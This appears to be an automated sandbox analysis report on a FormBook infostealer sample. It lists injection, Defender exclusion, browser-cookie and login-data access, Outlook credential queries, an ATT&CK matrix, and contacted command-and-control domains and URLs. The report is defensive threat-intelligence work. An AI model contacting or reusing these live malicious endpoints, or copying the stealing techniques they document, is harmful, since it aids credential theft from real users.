                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580361 Sample: SW_48912.scr.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 37 www.letsbookcruise.xyz 2->37 39 www.sorket.tech 2->39 41 12 other IPs or domains 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected FormBook 2->53 57 5 other signatures 2->57 10 SW_48912.scr.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 37->55 process4 file5 35 C:\Users\user\...\SW_48912.scr.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 71 Injects a PE file into a foreign processes 10->71 14 SW_48912.scr.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 kygSlzwdnMXWUy.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 WmiPrvSE.exe 17->22         started        24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 19->59 26 sdchange.exe 13 19->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 kygSlzwdnMXWUy.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 techstarllc.cloud 45.41.206.57, 49761, 49766, 49775 WEB2OBJECTSUS Reserved 29->43 45 www.cruycq.info 47.83.1.90, 49950, 49959, 49965 VODANETInternationalIP-BackboneofVodafoneDE United States 29->45 47 5 other IPs or domains 29->47 77 Found direct / indirect Syscall (likely to bypass EDR) 29->77 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SW_48912.scr.exe42%ReversingLabsWin32.Trojan.Swotter
                SW_48912.scr.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.1337street.shop/0gdu/?APatc2S=ftdEXwexurZghboTWCQIfexBY+9Yz0emmuPXGo7z5YH1NvMxMc1Z+hNvSZgcJAE/0+TeoQEUDOn3ji72SzidAcXn1q/xR22GeFlELvD1wSK+h6ylcF5G1Wk=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.sorket.tech/4emb/?APatc2S=4UULdis/QLNauySAEekUDYGsEUzq6e4B9T06+64m5ppnN51KKUcjYDTfNmInUMaV4Nrjr2QNBcJEKgo4MRK3zTGcylMwgMm1Um/ECC9y2F4s+sXg4aJXZlc=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.bgezakofe.shop/xyk7/?APatc2S=7w6h3yg5DzwdgNI65S7VcS/c5VHhBop0WwRkNseC06Sr52JwcWk0c6DqTwIm1K9fQyswYfQJG9wFl64D0T3JITTmdOuXWIhwMsN5rklNN+kNuHqELEqoQwI=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.letsbookcruise.xyz0%Avira URL Cloudsafe
                http://www.dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.sorket.tech/4emb/0%Avira URL Cloudsafe
                http://www.techstarllc.cloud/phws/0%Avira URL Cloudsafe
                http://www.cruycq.info/lf6y/0%Avira URL Cloudsafe
                http://www.hokasportshoes.shop/vupi/?APatc2S=Tq4/OmBpIxnnwNjJag9TFYyv8dvb/Sss2ypRVdq0cF+rzvKYwtC+P6jcfpXxbnkAS7eQgKkM8sOtTzDV8Gz3yNosqQRn5vos9Tvg5+UIPuaa+2ZkNRQX8Ww=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.hokasportshoes.shop/vupi/0%Avira URL Cloudsafe
                http://www.techstarllc.cloud/phws/?APatc2S=ocd4ZrzPXg6l4sWdfUN2xABm4ThkzzNaoz23ovA+FAa05WbJK6tPDbHnnDy/N4II5dY3pVgUKOhDHtvifryE7bJ5Z4nnWPOvcZ1hqHENcBbD3aMp/XsQNfk=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.dejikenkyu.cyou/pmpa/0%Avira URL Cloudsafe
                http://www.primetream.live/8t9s/0%Avira URL Cloudsafe
                http://www.primetream.live/8t9s/?APatc2S=cQOSSB92WrTaqBxCYQmY0/8zd7KVOpZ6t2v2QQp7ftKEyFsbpuIbzJ+m0CFldn0ugFGiUddTcSTZ3FmKLOS+RDlSRV2taFz1Xj7dqojcNfOZnPX4GO36V4Y=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                https://dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFle0%Avira URL Cloudsafe
                http://www.letsbookcruise.xyz/uwne/0%Avira URL Cloudsafe
                http://www.cruycq.info/lf6y/?APatc2S=WhdxLvX8GJneo6U33XtFYdZadP1zCD74gCKWMK8L+5irjEYccqFO+hPhPBcWoDythyZIL285KG4ZhivHPukP3bI3GzR3QcEebrpG7Eo0u0Vi5UP/PYQWYzw=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.1337street.shop/0gdu/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.primetream.live
                		162.0.236.169
                		truetrue
                  		unknown
                  94950.bodis.com
                  		199.59.243.227
                  		truefalse
                    		high
                    www.sorket.tech
                    		199.59.243.227
                    		truetrue
                      		unknown
                      www.bgezakofe.shop
                      		104.21.10.26
                      		truetrue
                        		unknown
                        techstarllc.cloud
                        		45.41.206.57
                        		truetrue
                          		unknown
                          www.dejikenkyu.cyou
                          		104.21.80.1
                          		truetrue
                            		unknown
                            natroredirect.natrocdn.com
                            		85.159.66.93
                            		truefalse
                              		high
                              www.cruycq.info
                              		47.83.1.90
                              		truetrue
                                		unknown
                                www.stoauto.pro
                                		194.58.112.174
                                		truefalse
                                  		unknown
                                  www.techstarllc.cloud
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.1337street.shop
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.hokasportshoes.shop
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.letsbookcruise.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.bgezakofe.shop/xyk7/?APatc2S=7w6h3yg5DzwdgNI65S7VcS/c5VHhBop0WwRkNseC06Sr52JwcWk0c6DqTwIm1K9fQyswYfQJG9wFl64D0T3JITTmdOuXWIhwMsN5rklNN+kNuHqELEqoQwI=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.1337street.shop/0gdu/?APatc2S=ftdEXwexurZghboTWCQIfexBY+9Yz0emmuPXGo7z5YH1NvMxMc1Z+hNvSZgcJAE/0+TeoQEUDOn3ji72SzidAcXn1q/xR22GeFlELvD1wSK+h6ylcF5G1Wk=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cruycq.info/lf6y/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sorket.tech/4emb/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hokasportshoes.shop/vupi/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sorket.tech/4emb/?APatc2S=4UULdis/QLNauySAEekUDYGsEUzq6e4B9T06+64m5ppnN51KKUcjYDTfNmInUMaV4Nrjr2QNBcJEKgo4MRK3zTGcylMwgMm1Um/ECC9y2F4s+sXg4aJXZlc=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.techstarllc.cloud/phws/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hokasportshoes.shop/vupi/?APatc2S=Tq4/OmBpIxnnwNjJag9TFYyv8dvb/Sss2ypRVdq0cF+rzvKYwtC+P6jcfpXxbnkAS7eQgKkM8sOtTzDV8Gz3yNosqQRn5vos9Tvg5+UIPuaa+2ZkNRQX8Ww=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.techstarllc.cloud/phws/?APatc2S=ocd4ZrzPXg6l4sWdfUN2xABm4ThkzzNaoz23ovA+FAa05WbJK6tPDbHnnDy/N4II5dY3pVgUKOhDHtvifryE7bJ5Z4nnWPOvcZ1hqHENcBbD3aMp/XsQNfk=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cruycq.info/lf6y/?APatc2S=WhdxLvX8GJneo6U33XtFYdZadP1zCD74gCKWMK8L+5irjEYccqFO+hPhPBcWoDythyZIL285KG4ZhivHPukP3bI3GzR3QcEebrpG7Eo0u0Vi5UP/PYQWYzw=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.primetream.live/8t9s/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dejikenkyu.cyou/pmpa/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.primetream.live/8t9s/?APatc2S=cQOSSB92WrTaqBxCYQmY0/8zd7KVOpZ6t2v2QQp7ftKEyFsbpuIbzJ+m0CFldn0ugFGiUddTcSTZ3FmKLOS+RDlSRV2taFz1Xj7dqojcNfOZnPX4GO36V4Y=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.letsbookcruise.xyz/uwne/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.1337street.shop/0gdu/true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabsdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designersGSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers/?SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/bTheSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers?SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.tiro.comSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designersSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.goodfont.co.krSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.sajatypeworks.comSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.typography.netDSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.google.comsdchange.exe, 0000000A.00000002.3541338963.0000000007570000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.000000000584E000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.0000000005398000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.00000000056BC000.00000004.10000000.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003BCE000.00000004.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003A3C000.00000004.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003718000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cn/cTheSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.galapagosdesign.com/staff/dennis.htmSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
